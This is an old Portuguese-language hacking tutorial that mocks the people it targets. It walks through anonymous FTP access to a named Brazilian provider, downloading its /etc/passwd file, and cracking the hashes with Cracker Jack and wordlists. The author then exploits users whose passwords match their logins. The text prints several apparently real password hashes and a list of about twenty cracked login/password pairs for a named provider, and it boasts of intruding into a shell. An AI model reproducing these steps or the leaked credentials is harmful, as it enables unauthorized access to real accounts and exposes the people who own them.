Eu LimP BiZKiT desenvolvi um metodo simples pra hackear provedo-
res NOVOS, nao esqueca do detalhe os admins tem que ser muito bestas
pra
levarem essa. Essa e' pra comecar mesmo... por isso nome do metodo
e'ME-
TODO LAMER.
\INGREDIENTES/
1- Programa pra utilizar o FTP, um pequeno e' o FTP.EXE
( PORRA ISSO VEM NO RUWINDOWS )
2- Pouco conhecimento...
( e' soh seguir estes passos )
3- Paciencia
( coloque uma musica Hare Krishna
)
4- Desencriptador ( jack pra dos ou crack41 pra linux)
( ambos na pagina ou por ai...
)
5- Uma wordlist pequena ( algo bem feitinho )
( pretendo colocar uma worlist
boa na minha pagina
mas por enquanto vc
usa a sua )
6- Um sysadmin burro!
( muito muito facil de achar...
)
7- Meia hora a sua disposicao
( bah! )
Bom, vamos pegar o exemplo de um provedor onde os administradores devem
ser muito burros. Ou querem levar mesmo...
O dominio escolhido e' valleybbs.com.br
UMA BBS DE SAO JOSE DOS CAMPOS - SP ....HAHAHAHAHAHAH
Essa e' a sessao de FTP realizada...
Observe abaixo que nos logamos como "anonymous" e colocamos como passwd
um mail comum, pode ser "silviosantos@sbt.com.br".
Nao coloque coisas muito louca como passwd que o operador pode desconfiar.
Saiba que seu IP esta sendo logado entao o legal mesmo seria ja estar
uti-
lizando uma conta hackeada.
C:\HACKING\ftphack>ftp
ftp> open valleybbs.com.br
Connected to valleybbs.com.br.
220 pingo FTP server (UNIX(r) System V Release 4.0) ready.
User (ginet.com.br:(none)): anonymous
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -la
200 PORT command successful.
150 ASCII data connection for /bin/ls (200.???.???.??,2475) (0 bytes).
total 14
drwxr-xr-x 6 0
1 512
Nov 15 20:50 .
drwxr-xr-x 6 0
1 512
Nov 15 20:50 ..
lrwxrwxrwx 1 0
1
7 Nov 15 20:50 bin -> usr/bin
dr-xr-xr-x 2 0
1 512
Nov 15 20:50 dev
dr-xr-xr-x 2 0
1 512
Nov 15 20:50 etc
drwxrwxrwx 7 30000 1
512 Jan 8 19:19 pub
drwxr-xr-x 5 0
1 512
Nov 15 20:50 usr
226 ASCII Transfer complete.
431 bytes received in 0.60 seconds (0.72 Kbytes/sec)
ftp>
ftp> cd etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (200.???.???.??,2476) (0 bytes).
group
netconfig
passwd
226 ASCII Transfer complete.
26 bytes received in 0.00 seconds (26000.00 Kbytes/sec)
ftp>
ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd (200.???.???.??,2477) (62 bytes).
226 ASCII Transfer complete.
63 bytes received in 0.06 seconds (1.05 Kbytes/sec)
ftp>
Bom! Ai ta o passwd, em alguns casos o shadow que contem as senhas en-
criptadas.
Esse e' o provedor onde os caras sao do tipo... burros demais!
Agora que temos o arquivo com as senhas o que devemos fazer? Vamos
desen-
criptalas.
Usem o crackerjack se vcs estiverem rodando em ambiente DOS, lembrem-se
o cjack nao roda ao mesmo tempo que o ruindows95, entao inicie o prompt
em modo de seguranca.
Pronto, vou colocar uma sessao de crack nas senhas aqui abaixo.
Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark
PWfile(s) : c:\raiz\contas\ginet\passwd
Wordfile : c:\hacking\diction.ary\axur
Initializing session data...
Loaded 52 total accounts with 50 different salts.
Cracking... (Hit any key for status, Ctrl-C to abort)
forest .(forest)
pinara .(9871)
Depois de exaustivo tempo larguei de mao, porra minha worlist menor
tem
3 megas e nunca pegou tao poucas senhas assim, eu uso esta lista com
pa-
lavras do dicionario quando quero economizar tempo ;) pq uma lista
gera-
da bem fica com no minino 600 megas.
Qual a primeira providencia que eu vou tomar?
Vou renomear o arquivo passwd e depois limpar ele, usando os proprios
lo-
gins como palavras pra wordlist.
gampert
regis
pinara
rodinei
patricia
marcelo
marcos
fernando::9809::::::
debora:wu6RAjzsZPVmI:9810::::::
fredi:AOIaiY4qoNnjs:9818::::::
bstudio:I3ge9NrA610ck:9818::::::
bbborges:L2bpLO7gP7o7U:9818:::::
setup --DEIXAR SOH O LOGIN-- :HB90Lijk05mpE:6445::::::
Vc soh deve deixar a primeira parte como eu fiz no exemplo acima.
Ai entao nos vamos tentar novamente crackear o arquivo passwd soh que
entendendo que os usuarios usam o login e a senha iguais.
Hehehe.. bingo!
Vou listar abaixo as senhas que eu peguei usando o metodo de login=senha
Provedor: ginet.com.br
login - senha
- - - - - -
bstudio - bstudio
oab_pf - oab_pf
nuhry - nuhry
jtelles - jtelles
demo1 - demo1
demo2 - demo2
demo3 - demo3
demo4 - demo4
demo5 - demo5
cmoura - cmoura
glaucia - glaucia
pedroso - pedroso
cotrijal - cotrijal
ameplan - ameplan
guto - guto
jmartins - jmartins
lguedes - lguedes
coopibt - coopibt
jferst - jferst
Coisa estupida ne'? Os caras usam quase todas as senhas e logins
iguais.
Agora e' soh vcs fazerem isso, mas lembrem-se e'muito dificil de achar
um
provedor estupido assim. {:^)
Depois que aprontei uma no shell eles cortaram o acesso,
ainda dah
pra ler uns mails, mas nao dah pra puxar telnet.